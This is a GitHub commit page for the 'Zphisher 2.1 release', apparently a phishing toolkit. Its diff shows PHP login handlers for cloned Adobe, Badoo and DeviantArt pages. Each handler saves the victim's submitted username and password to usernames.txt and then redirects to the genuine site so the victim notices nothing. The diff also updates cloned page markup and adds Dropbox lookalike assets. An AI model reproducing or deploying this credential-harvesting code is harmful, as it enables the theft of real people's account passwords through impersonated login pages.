Skip to content

Commit

Permalink
Zphisher 2.1 release
Browse files Browse the repository at this point in the history
  • Loading branch information
htr-tech committed Jan 16, 2021
1 parent b7196f6 commit 931f3d9
Show file tree
Hide file tree
Showing 168 changed files with 8,666 additions and 50,929 deletions.
3 changes: 2 additions & 1 deletion .sites/adobe/login.php
Original file line number Diff line number Diff line change
@@ -1,5 +1,6 @@
<?php

file_put_contents("usernames.txt", "Adobe Username: " . $_POST['username'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
file_put_contents("usernames.txt", "Adobe Username: " . $_POST['username'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: https://adobe.ly/2OE9ZKL');
exit();
?>
3 changes: 2 additions & 1 deletion .sites/badoo/login.php
Original file line number Diff line number Diff line change
@@ -1,5 +1,6 @@
<?php

file_put_contents("usernames.txt", "Badoo Username: " . $_POST['email'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
file_put_contents("usernames.txt", "Badoo Username: " . $_POST['email'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: https://badoo.com/forgot/');
exit();
?>
116 changes: 0 additions & 116 deletions .sites/cryptocoinsniper/login.html

This file was deleted.

5 changes: 0 additions & 5 deletions .sites/cryptocoinsniper/login.php

This file was deleted.

4 changes: 2 additions & 2 deletions .sites/deviantart/login.html
Original file line number Diff line number Diff line change
Expand Up @@ -12,7 +12,7 @@
<meta name="description" content="DeviantArt is the world's largest online social community for artists and art enthusiasts, allowing people to connect through the creation and sharing of art.">
<meta name="keywords" content="Art, Digital Art, Photography, Traditional Art, Community Art, Contemporary Art, Modern Art, Skins, Themes, Poetry, Prose, Applications, Wallpapers, Online Art, graphic Design, web Design, gaming, photography, animation, comic Books, digital Images">
<meta name="classification" content="Art">
<meta name="copyright" content="Copyright 2020 deviantART">
<meta name="copyright" content="Copyright 2021 deviantART">
<meta name="apple-itunes-app" content="app-id=925219396">
<meta name="twitter:site" content="@deviantart">
<meta name="twitter:card" content="summary_large_image">
Expand Down Expand Up @@ -321,7 +321,7 @@

<footer id="depths">
<div class="depths-inner">
<div class="footer_copyright">©2020 DeviantArt. All rights reserved</div>
<div class="footer_copyright">©2021 DeviantArt. All rights reserved</div>
<nav class="footer_tx_links">
<ul class="footer-menu-list">
<li class="footer-menu-list-item">
Expand Down
3 changes: 2 additions & 1 deletion .sites/deviantart/login.php
Original file line number Diff line number Diff line change
@@ -1,5 +1,6 @@
<?php

file_put_contents("usernames.txt", "Deviantart Username: " . $_POST['username'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
file_put_contents("usernames.txt", "Deviantart Username: " . $_POST['username'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: https://www.deviantart.com/users/forgot/');
exit();
?>
Binary file added .sites/dropbox/dropbox1.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added .sites/dropbox/dropbox2.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added .sites/dropbox/dropbox3.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
24 changes: 24 additions & 0 deletions .sites/dropbox/dropbox4.svg
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
11 changes: 11 additions & 0 deletions .sites/dropbox/dropbox5.svg
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
4 changes: 4 additions & 0 deletions .sites/dropbox/dropbox6.svg
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading

0 comments on commit 931f3d9

Please sign in to comment.